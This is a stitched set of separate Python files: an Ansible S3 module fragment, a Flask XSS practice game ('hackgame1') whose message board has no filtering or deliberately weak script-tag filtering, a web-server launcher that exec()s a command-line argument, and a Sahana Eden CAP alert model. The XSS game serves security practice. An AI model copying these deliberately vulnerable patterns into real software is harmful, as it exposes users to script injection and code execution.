prefix = dict(default=None),
retries = dict(aliases=['retry'], type='int', default=0),
s3_url = dict(aliases=['S3_URL']),
src = dict(),
),
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
bucket = module.params.get('bucket')
encrypt = module.params.get('encrypt')
expiry = int(module.params['expiry'])
if module.params.get('dest'):
dest = os.path.expanduser(module.params.get('dest'))
headers = module.params.get('headers')
marker = module.params.get('marker')
max_keys = module.params.get('max_keys')
metadata = module.params.get('metadata')
mode = module.params.get('mode')
obj = module.params.get('object')
version = module.params.get('version')
overwrite = module.params.get('overwrite')
prefix = module.params.get('prefix')
retries = module.params.get('retries')
s3_url = module.params.get('s3_url')
src = module.params.get('src')
if overwrite not in ['always', 'never', 'different']:
if module.boolean(overwrite):
overwrite = 'always'
else:
overwrite='never'
if overwrite not in ['always', 'never', 'different']:
if module.boolean(overwrite):
overwrite = 'always'
else:
overwrite='never'
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if region in ('us-east-1', '', None):
# S3ism for the US Standard region
location = Location.DEFAULT
else:
# Boto uses symbolic names for locations but region strings will
# actually work fine for everything except us-east-1 (US Standard)
location = region
if module.params.get('object'):
obj = os.path.expanduser(module.params['object'])
# allow eucarc environment variables to be used if ansible vars aren't set
if not s3_url and 'S3_URL' in os.environ:
s3_url = os.environ['S3_URL']
# bucket names with .'s in them need to use the calling_format option,
# otherwise the connection will fail. See https://github.com/boto/boto/issues/2836
# for more details.
if '.' in bucket:
aws_connect_kwargs['calling_format'] = OrdinaryCallingFormat()
# Look at s3_url and tweak connection settings
# if connecting to Walrus or fakes3
try:
if is_fakes3(s3_url):
fakes3 = urlparse.urlparse(s3_url)
s3 = S3Connection(
is_secure=fakes3.scheme == 'fakes3s',
host=fakes3.hostname,
port=fakes3.port,
calling_format=OrdinaryCallingFormat(),
**aws_connect_kwargs
)
elif is_walrus(s3_url):
walrus = urlparse.urlparse(s3_url).hostname
s3 = boto.connect_walrus(walrus, **aws_connect_kwargs)
else:
s3 = boto.s3.connect_to_region(location, is_secure=True, **aws_connect_kwargs)
# use this as fallback because connect_to_region seems to fail in boto + non 'classic' aws accounts in some cases
if s3 is None:
s3 = boto.connect_s3(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg='No Authentication Handler found: %s ' % str(e))
except Exception, e:
module.fail_json(msg='Failed to connect to S3: %s' % str(e))
if s3 is None: # this should never happen
module.fail_json(msg ='Unknown error, failed to create s3 connection, no information from boto.')
# If our mode is a GET operation (download), go through the procedure as appropriate ...
if mode == 'get':
# First, we check to see if the bucket exists, we get "bucket" returned.
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Target bucket cannot be found", failed=True)
# Next, we check to see if the key in the bucket exists. If it exists, it also returns key_matches md5sum check.
keyrtn = key_check(module, s3, bucket, obj, version=version)
if keyrtn is False:
if version is not None:
module.fail_json(msg="Key %s with version id %s does not exist."% (obj, version), failed=True)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
# If the destination path doesn't exist or overwrite is True, no need to do the md5um etag check, so just download.
pathrtn = path_check(dest)
if pathrtn is False or overwrite == 'always':
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
# Compare the remote MD5 sum of the object with the local dest md5sum, if it already exists.
if pathrtn is True:
md5_remote = keysum(module, s3, bucket, obj, version=version)
md5_local = module.md5(dest)
if md5_local == md5_remote:
sum_matches = True
if overwrite == 'always':
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
else:
module.exit_json(msg="Local and remote object are identical, ignoring. Use overwrite=always parameter to force.", changed=False)
else:
sum_matches = False
if overwrite in ('always', 'different'):
download_s3file(module, s3, bucket, obj, dest, retries, version=version)
else:
module.exit_json(msg="WARNING: Checksums do not match. Use overwrite parameter to force download.")
# Firstly, if key_matches is TRUE and overwrite is not enabled, we EXIT with a helpful message.
if sum_matches is True and overwrite == 'never':
module.exit_json(msg="Local and remote object are identical, ignoring. Use overwrite parameter to force.", changed=False)
# if our mode is a PUT operation (upload), go through the procedure as appropriate ...
if mode == 'put':
# Use this snippet to debug through conditionals:
# module.exit_json(msg="Bucket return %s"%bucketrtn)
# sys.exit(0)
# Lets check the src path.
pathrtn = path_check(src)
if pathrtn is False:
module.fail_json(msg="Local object for PUT does not exist", failed=True)
# Lets check to see if bucket exists to get ground truth.
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
keyrtn = key_check(module, s3, bucket, obj)
# Lets check key state. Does it exist and if it does, compute the etag md5sum.
if bucketrtn is True and keyrtn is True:
md5_remote = keysum(module, s3, bucket, obj)
md5_local = module.md5(src)
if md5_local == md5_remote:
sum_matches = True
if overwrite == 'always':
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
else:
get_download_url(module, s3, bucket, obj, expiry, changed=False)
else:
sum_matches = False
if overwrite in ('always', 'different'):
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
else:
module.exit_json(msg="WARNING: Checksums do not match. Use overwrite parameter to force upload.")
# If neither exist (based on bucket existence), we can create both.
if bucketrtn is False and pathrtn is True:
create_bucket(module, s3, bucket, location)
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
# If bucket exists but key doesn't, just upload.
if bucketrtn is True and pathrtn is True and keyrtn is False:
upload_s3file(module, s3, bucket, obj, src, expiry, metadata, encrypt, headers)
# Delete an object from a bucket, not the entire bucket
if mode == 'delobj':
if obj is None:
module.fail_json(msg="object parameter is required", failed=True);
if bucket:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
deletertn = delete_key(module, s3, bucket, obj)
if deletertn is True:
module.exit_json(msg="Object %s deleted from bucket %s." % (obj, bucket), changed=True)
else:
module.fail_json(msg="Bucket does not exist.", changed=False)
else:
module.fail_json(msg="Bucket parameter is required.", failed=True)
# Delete an entire bucket, including all objects in the bucket
if mode == 'delete':
if bucket:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
deletertn = delete_bucket(module, s3, bucket)
if deletertn is True:
module.exit_json(msg="Bucket %s and all keys have been deleted."%bucket, changed=True)
else:
module.fail_json(msg="Bucket does not exist.", changed=False)
else:
module.fail_json(msg="Bucket parameter is required.", failed=True)
# Support for listing a set of keys
if mode == 'list':
bucket_object = get_bucket(module, s3, bucket)
# If the bucket does not exist then bail out
if bucket_object is None:
module.fail_json(msg="Target bucket (%s) cannot be found"% bucket, failed=True)
list_keys(module, bucket_object, prefix, marker, max_keys)
# Need to research how to create directories without "populating" a key, so this should just do bucket creation for now.
# WE SHOULD ENABLE SOME WAY OF CREATING AN EMPTY KEY TO CREATE "DIRECTORY" STRUCTURE, AWS CONSOLE DOES THIS.
if mode == 'create':
if bucket and not obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is True:
module.exit_json(msg="Bucket already exists.", changed=False)
else:
module.exit_json(msg="Bucket created successfully", changed=create_bucket(module, s3, bucket, location))
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if obj.endswith('/'):
dirobj = obj
else:
dirobj = obj + "/"
if bucketrtn is True:
keyrtn = key_check(module, s3, bucket, dirobj)
if keyrtn is True:
module.exit_json(msg="Bucket %s and key %s already exists."% (bucket, obj), changed=False)
else:
create_dirkey(module, s3, bucket, dirobj)
if bucketrtn is False:
created = create_bucket(module, s3, bucket, location)
create_dirkey(module, s3, bucket, dirobj)
# Support for grabbing the time-expired URL for an object in S3/Walrus.
if mode == 'geturl':
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Bucket %s does not exist."%bucket, failed=True)
else:
keyrtn = key_check(module, s3, bucket, obj)
if keyrtn is True:
get_download_url(module, s3, bucket, obj, expiry)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
else:
module.fail_json(msg="Bucket and Object parameters must be set", failed=True)
if mode == 'getstr':
if bucket and obj:
bucketrtn = bucket_check(module, s3, bucket)
if bucketrtn is False:
module.fail_json(msg="Bucket %s does not exist."%bucket, failed=True)
else:
keyrtn = key_check(module, s3, bucket, obj, version=version)
if keyrtn is True:
download_s3str(module, s3, bucket, obj, version=version)
else:
if version is not None:
module.fail_json(msg="Key %s with version id %s does not exist."% (obj, version), failed=True)
else:
module.fail_json(msg="Key %s does not exist."%obj, failed=True)
module.exit_json(failed=False)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
# coding:utf-8
from flask import Flask, url_for, render_template, request, Response, session, redirect
from . import hackgame1
from ..models.message import Messages
from ..utils.random_token import random_token
from ..utils.string_filter import script_tag_recursive_filter, script_tag_filter, script_tag_nf_filter
levels_map = [
lambda x: x,
script_tag_filter,
script_tag_nf_filter,
script_tag_recursive_filter
]
levels_tip_map=[
"",
"",
"",
""
]
@DeprecationWarning
def generate_indentity(fn):
def wrapper():
print "generate!!!"
if session.get('token') is None:
session['token'] = random_token()
fn()
return wrapper
@hackgame1.route('/')
def index():
if not session.get('token'):
session['token'] = random_token()
return render_template('hackgame1/index.html')
@hackgame1.route('/add_message', methods=['POST'])
def add_message():
stage = request.form.get('redirect')
content = request.form.get('content')
try:
print stage+" submit"
stage = int(stage)
except ValueError as e:
print e.message
return 'invalid request', 400
try:
content=levels_map[stage-1](content)
except:
return 'invalid request', 400
token = session.get('token')
Messages.add_message("", content, token)
return redirect(url_for('hackgame1.stage', level=stage))
@hackgame1.route('/delete_message', methods=['POST'])
def delete_message():
id = request.form.get('id')
Messages.delete_message(id)
redirect_method = request.form.get('redirect')
return redirect(url_for('hackgame1.stage', level=redirect_method))
# template test
@hackgame1.route('/delete_my_message', methods=['POST'])
def delete_my_message():
token = session.get('token')
if Messages.delete_my_message(token):
return "success"
else:
return "failed"
@hackgame1.route('/tt1')
def template_test_board():
return render_template('hackgame1/board.html')
@hackgame1.route('/stage')
def stage():
stage = request.args.get('level')
try:
stage = int(stage)
except ValueError as e:
print e.message
return 'invalid request', 400
if stage > len(levels_map)+1:
print stage
print len(levels_map)
return 'invalid argument', 404
current_stage = stage
try:
tip=levels_tip_map[stage]
except IndexError as e:
tip = None
print e.message
if stage < len(levels_map):
next_stage = current_stage + 1
else:
next_stage = None
messages = Messages.fetch_messages_by_token(session.get('token') or "")
return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
next_stage=next_stage,tip=tip)
# # 第一关
# @hackgame1.route('/stage1')
# def stage1():
# current_stage = 'stage1'
# next_stage = 'stage2'
# messages = Messages.fetch_messages_by_token(session.get('token') or "")
# return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
# next_stage=next_stage)
#
#
# # 第二关
# @hackgame1.route('/stage2')
# def stage2():
# current_stage = 'stage2'
# next_stage = 'stage3'
# messages = Messages.fetch_messages_by_token(session.get('token') or "")
# return render_template('hackgame1/board.html', messages=messages, current_stage=current_stage,
# next_stage=next_stage)
#
#
# @hackgame1.route('/stage3')
# def stage3():
# return
#
#
# @hackgame1.route('/stage4')
# def stage4():
# return
|
#!/usr/bin/python
###########################
#
# tiger 1.0
# (C) 2014 WatsonSoft
# made by JamesWatson
#
###########################
#encoding=utf-8
import sys
import os
import inspect
import threading
from socket import *
from time import sleep
sys.path.append(os.getcwd()+"/../lib")
sys.path.append(os.getcwd()+"/../lib/WS_tiger")
from HttpDict import *
from debug import *
from HttpDispatcher import *
from SessionManager import *
from webServerKernel import *
def HttpServCtrl(dispatcher, sm, addr, max):
logPuts("ctrl thread running...")
ss = socket(AF_INET, SOCK_STREAM)
ss.bind(addr)
ss.listen(max)
while(True):
csfd, Caddr = ss.accept()
break
csfd.recv(65535)
head = "HTTP/1.1 200 OK\r\n"
head+= "Content-Type: text/html; UTF-8\r\n"
head+= "Server: WS_Tiger/1.0\r\n"
head+= "Content-Encoding: identity\r\n"
head+= "Accept-Ranges: bytes\r\n\r\n\r\n"
page = "<!DOCTYPE html>\n<html>\n<head><title>Server Control</title></head>\n<body>\n\t<h1>Server will Close"
application.setAttr('Head', head)
application.setAttr('Page', page + "d!</h1>\n</body>\n</html>")
shutTime = cfg['shutTime']
page += ", out time is "+ shutTime +"s!</h1>\n</body>\n</html>"
csfd.send(head)
csfd.send(page)
csfd.close()
application.setAttr('ServState', "shutDown")
ss.close()
def main():
this_file = inspect.getfile(inspect.currentframe())
here = os.path.abspath(os.path.dirname(this_file))
try:
os.chdir( "../etc/WS_tiger" )
fd = open( 'config.ini' )
text = fd.read()
fd.close()
cfgText(cfg, text, "\n", " = ")
for i in cfg:
if( '\r' == cfg[ i ][-1] ):
cfg[ i ] = cfg[ i ][:-1]
os.chdir( cfg['webApp'] )
cwd = os.getcwd()
sys.path.append( cwd )
sys.path.append( cwd+"/lib" )
os.chdir( "ROOT" )
except Exception as e:
print(e)
exit(1)
dispatcher = HttpDispatcher()
sm = SessionManager()
logPuts("init finish...")
if( "true" == cfg['WEB'] ):
tPro= threading.Thread( target=HttpServCore, args=(dispatcher, sm, ('', int(cfg['proPort'])), 5) )
tPro.setDaemon(True)
tPro.start()
logPuts("core thread running...")
if( "true" == cfg['SSL'] ):
tPros=threading.Thread( target=HttpServSafe, args=(dispatcher, sm, ('', int(cfg['prosPort'])), 5) )
tPros.setDaemon(True)
tPros.start()
logPuts("safe thread running...")
HttpServCtrl(dispatcher, sm, (cfg['ctrlAddr'], int(cfg['ctrlPort'])), 5)
shutTime = cfg['shutTime']
sleep(int(shutTime))
return
def version():
print('WS_tiger 1.0')
print('(C) 2014 WatsonSoft')
print('made by JamesWatson')
print('This is free software; see the source for copying conditions.')
print('There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n')
def help():
print('Usage: WS_tiger [options]')
print('Options:')
print(' --help Display this information')
print(' --version Display compiler version information\n')
if '__main__' == __name__:
if( 1 < len(sys.argv) ):
try:
com = sys.argv[1][2:]+"()"
exec(com)
exit(0)
except Exception as e:
help()
exit(1)
logPuts("Server is launching...")
main()
logPuts("Server has been terminated.")
exit(0)
|
# -*- coding: utf-8 -*-
""" Sahana Eden Common Alerting Protocol (CAP) Model
@copyright: 2009-2014 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3CAPModel",
"cap_info_labels",
"cap_alert_is_template",
"cap_rheader",
"cap_gis_location_xml_post_parse",
"cap_gis_location_xml_post_render",
)
import datetime
import urllib2 # Needed for quoting & error handling on fetch
try:
from cStringIO import StringIO # Faster, where available
except:
from StringIO import StringIO
from gluon import *
from gluon.storage import Storage
from gluon.tools import fetch
from ..s3 import *
# =============================================================================
class S3CAPModel(S3Model):
"""
CAP: Common Alerting Protocol
- this module is a non-functional stub
http://eden.sahanafoundation.org/wiki/BluePrint/Messaging#CAP
"""
names = ("cap_alert",
"cap_alert_represent",
"cap_info",
"cap_info_represent",
"cap_resource",
"cap_area",
"cap_area_represent",
"cap_area_location",
"cap_area_tag",
"cap_info_category_opts",
)
def model(self):
T = current.T
db = current.db
settings = current.deployment_settings
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# List of Incident Categories -- copied from irs module <--
# @ToDo: Switch to using event_incident_type
#
# The keys are based on the Canadian ems.incident hierarchy, with a
# few extra general versions added to 'other'
# The values are meant for end-users, so can be customised as-required
# NB It is important that the meaning of these entries is not changed
# as otherwise this hurts our ability to do synchronisation
# Entries can be hidden from user view in the controller.
# Additional sets of 'translations' can be added to the tuples.
cap_incident_type_opts = {
"animalHealth.animalDieOff": T("Animal Die Off"),
"animalHealth.animalFeed": T("Animal Feed"),
"aviation.aircraftCrash": T("Aircraft Crash"),
"aviation.aircraftHijacking": T("Aircraft Hijacking"),
"aviation.airportClosure": T("Airport Closure"),
"aviation.airspaceClosure": T("Airspace Closure"),
"aviation.noticeToAirmen": T("Notice to Airmen"),
"aviation.spaceDebris": T("Space Debris"),
"civil.demonstrations": T("Demonstrations"),
"civil.dignitaryVisit": T("Dignitary Visit"),
"civil.displacedPopulations": T("Displaced Populations"),
"civil.emergency": T("Civil Emergency"),
"civil.looting": T("Looting"),
"civil.publicEvent": T("Public Event"),
"civil.riot": T("Riot"),
"civil.volunteerRequest": T("Volunteer Request"),
"crime": T("Crime"),
"crime.bomb": T("Bomb"),
"crime.bombExplosion": T("Bomb Explosion"),
"crime.bombThreat": T("Bomb Threat"),
"crime.dangerousPerson": T("Dangerous Person"),
"crime.drugs": T("Drugs"),
"crime.homeCrime": T("Home Crime"),
"crime.illegalImmigrant": T("Illegal Immigrant"),
"crime.industrialCrime": T("Industrial Crime"),
"crime.poisoning": T("Poisoning"),
"crime.retailCrime": T("Retail Crime"),
"crime.shooting": T("Shooting"),
"crime.stowaway": T("Stowaway"),
"crime.terrorism": T("Terrorism"),
"crime.vehicleCrime": T("Vehicle Crime"),
"fire": T("Fire"),
"fire.forestFire": T("Forest Fire"),
"fire.hotSpot": T("Hot Spot"),
"fire.industryFire": T("Industry Fire"),
"fire.smoke": T("Smoke"),
"fire.urbanFire": T("Urban Fire"),
"fire.wildFire": T("Wild Fire"),
"flood": T("Flood"),
"flood.damOverflow": T("Dam Overflow"),
"flood.flashFlood": T("Flash Flood"),
"flood.highWater": T("High Water"),
"flood.overlandFlowFlood": T("Overland Flow Flood"),
"flood.tsunami": T("Tsunami"),
"geophysical.avalanche": T("Avalanche"),
"geophysical.earthquake": T("Earthquake"),
"geophysical.lahar": T("Lahar"),
"geophysical.landslide": T("Landslide"),
"geophysical.magneticStorm": T("Magnetic Storm"),
"geophysical.meteorite": T("Meteorite"),
"geophysical.pyroclasticFlow": T("Pyroclastic Flow"),
"geophysical.pyroclasticSurge": T("Pyroclastic Surge"),
"geophysical.volcanicAshCloud": T("Volcanic Ash Cloud"),
"geophysical.volcanicEvent": T("Volcanic Event"),
"hazardousMaterial": T("Hazardous Material"),
"hazardousMaterial.biologicalHazard": T("Biological Hazard"),
"hazardousMaterial.chemicalHazard": T("Chemical Hazard"),
"hazardousMaterial.explosiveHazard": T("Explosive Hazard"),
"hazardousMaterial.fallingObjectHazard": T("Falling Object Hazard"),
"hazardousMaterial.infectiousDisease": T("Infectious Disease (Hazardous Material)"),
"hazardousMaterial.poisonousGas": T("Poisonous Gas"),
"hazardousMaterial.radiologicalHazard": T("Radiological Hazard"),
"health.infectiousDisease": T("Infectious Disease"),
"health.infestation": T("Infestation"),
"ice.iceberg": T("Iceberg"),
"ice.icePressure": T("Ice Pressure"),
"ice.rapidCloseLead": T("Rapid Close Lead"),
"ice.specialIce": T("Special Ice"),
"marine.marineSecurity": T("Marine Security"),
"marine.nauticalAccident": T("Nautical Accident"),
"marine.nauticalHijacking": T("Nautical Hijacking"),
"marine.portClosure": T("Port Closure"),
"marine.specialMarine": T("Special Marine"),
"meteorological.blizzard": T("Blizzard"),
"meteorological.blowingSnow": T("Blowing Snow"),
"meteorological.drought": T("Drought"),
"meteorological.dustStorm": T("Dust Storm"),
"meteorological.fog": T("Fog"),
"meteorological.freezingDrizzle": T("Freezing Drizzle"),
"meteorological.freezingRain": T("Freezing Rain"),
"meteorological.freezingSpray": T("Freezing Spray"),
"meteorological.hail": T("Hail"),
"meteorological.hurricane": T("Hurricane"),
"meteorological.rainFall": T("Rain Fall"),
"meteorological.snowFall": T("Snow Fall"),
"meteorological.snowSquall": T("Snow Squall"),
"meteorological.squall": T("Squall"),
"meteorological.stormSurge": T("Storm Surge"),
"meteorological.thunderstorm": T("Thunderstorm"),
"meteorological.tornado": T("Tornado"),
"meteorological.tropicalStorm": T("Tropical Storm"),
"meteorological.waterspout": T("Waterspout"),
"meteorological.winterStorm": T("Winter Storm"),
"missingPerson": T("Missing Person"),
# http://en.wikipedia.org/wiki/Amber_Alert
"missingPerson.amberAlert": T("Child Abduction Emergency"),
"missingPerson.missingVulnerablePerson": T("Missing Vulnerable Person"),
# http://en.wikipedia.org/wiki/Silver_Alert
"missingPerson.silver": T("Missing Senior Citizen"),
"publicService.emergencySupportFacility": T("Emergency Support Facility"),
"publicService.emergencySupportService": T("Emergency Support Service"),
"publicService.schoolClosure": T("School Closure"),
"publicService.schoolLockdown": T("School Lockdown"),
"publicService.serviceOrFacility": T("Service or Facility"),
"publicService.transit": T("Transit"),
"railway.railwayAccident": T("Railway Accident"),
"railway.railwayHijacking": T("Railway Hijacking"),
"roadway.bridgeClosure": T("Bridge Closed"),
"roadway.hazardousRoadConditions": T("Hazardous Road Conditions"),
"roadway.roadwayAccident": T("Road Accident"),
"roadway.roadwayClosure": T("Road Closed"),
"roadway.roadwayDelay": T("Road Delay"),
"roadway.roadwayHijacking": T("Road Hijacking"),
"roadway.roadwayUsageCondition": T("Road Usage Condition"),
"roadway.trafficReport": T("Traffic Report"),
"temperature.arcticOutflow": T("Arctic Outflow"),
"temperature.coldWave": T("Cold Wave"),
"temperature.flashFreeze": T("Flash Freeze"),
"temperature.frost": T("Frost"),
"temperature.heatAndHumidity": T("Heat and Humidity"),
"temperature.heatWave": T("Heat Wave"),
"temperature.windChill": T("Wind Chill"),
"wind.galeWind": T("Gale Wind"),
"wind.hurricaneForceWind": T("Hurricane Force Wind"),
"wind.stormForceWind": T("Storm Force Wind"),
"wind.strongWind": T("Strong Wind"),
"other.buildingCollapsed": T("Building Collapsed"),
"other.peopleTrapped": T("People Trapped"),
"other.powerFailure": T("Power Failure"),
}
# ---------------------------------------------------------------------
# CAP alerts
#
# CAP alert Status Code (status)
cap_alert_status_code_opts = OrderedDict([
("Actual", T("Actual - actionable by all targeted recipients")),
("Exercise", T("Exercise - only for designated participants (decribed in note)")),
("System", T("System - for internal functions")),
("Test", T("Test - testing, all recipients disregard")),
("Draft", T("Draft - not actionable in its current form")),
])
# CAP alert message type (msgType)
cap_alert_msgType_code_opts = OrderedDict([
("Alert", T("Alert: Initial information requiring attention by targeted recipients")),
("Update", T("Update: Update and supercede earlier message(s)")),
("Cancel", T("Cancel: Cancel earlier message(s)")),
("Ack", T("Ack: Acknowledge receipt and acceptance of the message(s)")),
("Error", T("Error: Indicate rejection of the message(s)")),
])
# CAP alert scope
cap_alert_scope_code_opts = OrderedDict([
("Public", T("Public - unrestricted audiences")),
("Restricted", T("Restricted - to users with a known operational requirement (described in restriction)")),
("Private", T("Private - only to specified addresses (mentioned as recipients)"))
])
# CAP info categories
cap_info_category_opts = OrderedDict([
("Geo", T("Geophysical (inc. landslide)")),
("Met", T("Meteorological (inc. flood)")),
("Safety", T("General emergency and public safety")),
("Security", T("Law enforcement, military, homeland and local/private security")),
("Rescue", T("Rescue and recovery")),
("Fire", T("Fire suppression and rescue")),
("Health", T("Medical and public health")),
("Env", T("Pollution and other environmental")),
("Transport", T("Public and private transportation")),
("Infra", T("Utility, telecommunication, other non-transport infrastructure")),
("CBRNE", T("Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack")),
("Other", T("Other events")),
])
tablename = "cap_alert"
define_table(tablename,
Field("is_template", "boolean",
readable = False,
writable = True,
),
Field("template_id", "reference cap_alert",
label = T("Template"),
ondelete = "RESTRICT",
represent = self.template_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_alert.id",
self.template_represent,
filterby="is_template",
filter_opts=(True,)
)),
comment = T("Apply a template"),
),
Field("template_title",
label = T("Template Title"),
),
Field("template_settings", "text",
default = "{}",
readable = False,
),
Field("identifier", unique=True, length=128,
default = self.generate_identifier,
label = T("Identifier"),
),
Field("sender",
label = T("Sender"),
default = self.generate_sender,
# @todo: can not be empty in alerts (validator!)
),
s3_datetime("sent",
default = "now",
writable = False,
),
Field("status",
default = "Draft",
label = T("Status"),
requires = IS_IN_SET(cap_alert_status_code_opts),
),
Field("msg_type",
label = T("Message Type"),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_alert_msgType_code_opts)
),
),
Field("source",
label = T("Source"),
),
Field("scope",
label = T("Scope"),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_alert_scope_code_opts)
),
),
# Text describing the restriction for scope=restricted
Field("restriction", "text",
label = T("Restriction"),
),
Field("addresses", "list:string",
label = T("Recipients"),
represent = self.list_string_represent,
#@ToDo: provide a better way to add multiple addresses,
# do not ask the user to delimit it themselves
# this should eventually use the CAP contacts
#widget = S3CAPAddressesWidget,
),
Field("codes", "text",
default = settings.get_cap_codes(),
label = T("Codes"),
represent = S3KeyValueWidget.represent,
widget = S3KeyValueWidget(),
),
Field("note", "text",
label = T("Note"),
),
Field("reference", "list:reference cap_alert",
label = T("Reference"),
represent = S3Represent(lookup = tablename,
fields = ["msg_type", "sent", "sender"],
field_sep = " - ",
multiple = True,
),
# @ToDo: This should not be manually entered,
# needs a widget
#widget = S3ReferenceWidget(table,
# one_to_many=True,
# allow_create=False),
),
# @ToDo: Switch to using event_incident_type_id
Field("incidents", "list:string",
label = T("Incidents"),
represent = S3Represent(options = cap_incident_type_opts,
multiple = True),
requires = IS_EMPTY_OR(
IS_IN_SET(cap_incident_type_opts,
multiple = True,
sort = True,
)),
widget = S3MultiSelectWidget(),
),
*s3_meta_fields())
filter_widgets = [
S3TextFilter(["identifier",
"sender",
"incidents",
"cap_info.headline",
"cap_info.event",
],
label = T("Search"),
comment = T("Search for an Alert by sender, incident, headline or event."),
),
S3OptionsFilter("info.category",
label = T("Category"),
options = cap_info_category_opts,
),
S3LocationFilter("location.location_id",
label = T("Location(s)"),
# options = gis.get_countries().keys(),
),
S3OptionsFilter("info.language",
label = T("Language"),
),
]
configure(tablename,
context = {"location": "location.location_id",
},
filter_widgets = filter_widgets,
onvalidation = self.cap_alert_form_validation,
)
# Components
add_components(tablename,
cap_area = "alert_id",
cap_area_location = {"name": "location",
"joinby": "alert_id",
},
cap_info = "alert_id",
cap_resource = "alert_id",
)
self.set_method("cap", "alert",
method = "import_feed",
action = CAPImportFeed())
if crud_strings["cap_template"]:
crud_strings[tablename] = crud_strings["cap_template"]
else:
ADD_ALERT = T("Create Alert")
crud_strings[tablename] = Storage(
label_create = ADD_ALERT,
title_display = T("Alert Details"),
title_list = T("Alerts"),
# If already-published, this should create a new "Update"
# alert instead of modifying the original
title_update = T("Edit Alert"),
title_upload = T("Import Alerts"),
label_list_button = T("List Alerts"),
label_delete_button = T("Delete Alert"),
msg_record_created = T("Alert created"),
msg_record_modified = T("Alert modified"),
msg_record_deleted = T("Alert deleted"),
msg_list_empty = T("No alerts to show"))
alert_represent = S3Represent(lookup = tablename,
fields = ["msg_type", "sent", "sender"],
field_sep = " - ")
alert_id = S3ReusableField("alert_id", "reference %s" % tablename,
comment = T("The alert message containing this information"),
label = T("Alert"),
ondelete = "CASCADE",
represent = alert_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_alert.id",
alert_represent)),
)
# ---------------------------------------------------------------------
# CAP info segments
#
cap_info_responseType_opts = OrderedDict([
("Shelter", T("Shelter - Take shelter in place or per instruction")),
("Evacuate", T("Evacuate - Relocate as instructed in the instruction")),
("Prepare", T("Prepare - Make preparations per the instruction")),
("Execute", T("Execute - Execute a pre-planned activity identified in instruction")),
("Avoid", T("Avoid - Avoid the subject event as per the instruction")),
("Monitor", T("Monitor - Attend to information sources as described in instruction")),
("Assess", T("Assess - Evaluate the information in this message.")),
("AllClear", T("AllClear - The subject event no longer poses a threat")),
("None", T("None - No action recommended")),
])
cap_info_urgency_opts = OrderedDict([
("Immediate", T("Response action should be taken immediately")),
("Expected", T("Response action should be taken soon (within next hour)")),
("Future", T("Responsive action should be taken in the near future")),
("Past", T("Responsive action is no longer required")),
("Unknown", T("Unknown")),
])
cap_info_severity_opts = OrderedDict([
("Extreme", T("Extraordinary threat to life or property")),
("Severe", T("Significant threat to life or property")),
("Moderate", T("Possible threat to life or property")),
("Minor", T("Minimal to no known threat to life or property")),
("Unknown", T("Severity unknown")),
])
cap_info_certainty_opts = OrderedDict([
("Observed", T("Observed: determined to have occurred or to be ongoing")),
("Likely", T("Likely (p > ~50%)")),
("Possible", T("Possible but not likely (p <= ~50%)")),
("Unlikely", T("Not expected to occur (p ~ 0)")),
("Unknown", T("Certainty unknown")),
])
# CAP info priority
priorities = settings.get_cap_priorities()
try:
cap_info_priority_opts = OrderedDict([(f[0], f[1]) for f in priorities]
+ [("Undefined", T("Undefined"))])
except IndexError:
raise ValueError("CAP priorities setting is not structured properly")
# @ToDo: i18n: Need label=T("")
tablename = "cap_info"
define_table(tablename,
alert_id(),
Field("is_template", "boolean",
default = False,
readable = False,
writable = False,
),
Field("template_info_id", "reference cap_info",
ondelete = "RESTRICT",
readable = False,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "cap_info.id",
self.template_represent,
filterby="is_template",
filter_opts=(True,)
)),
widget = S3HiddenWidget(),
),
Field("template_settings", "text",
readable = False,
),
Field("language",
default = "en",
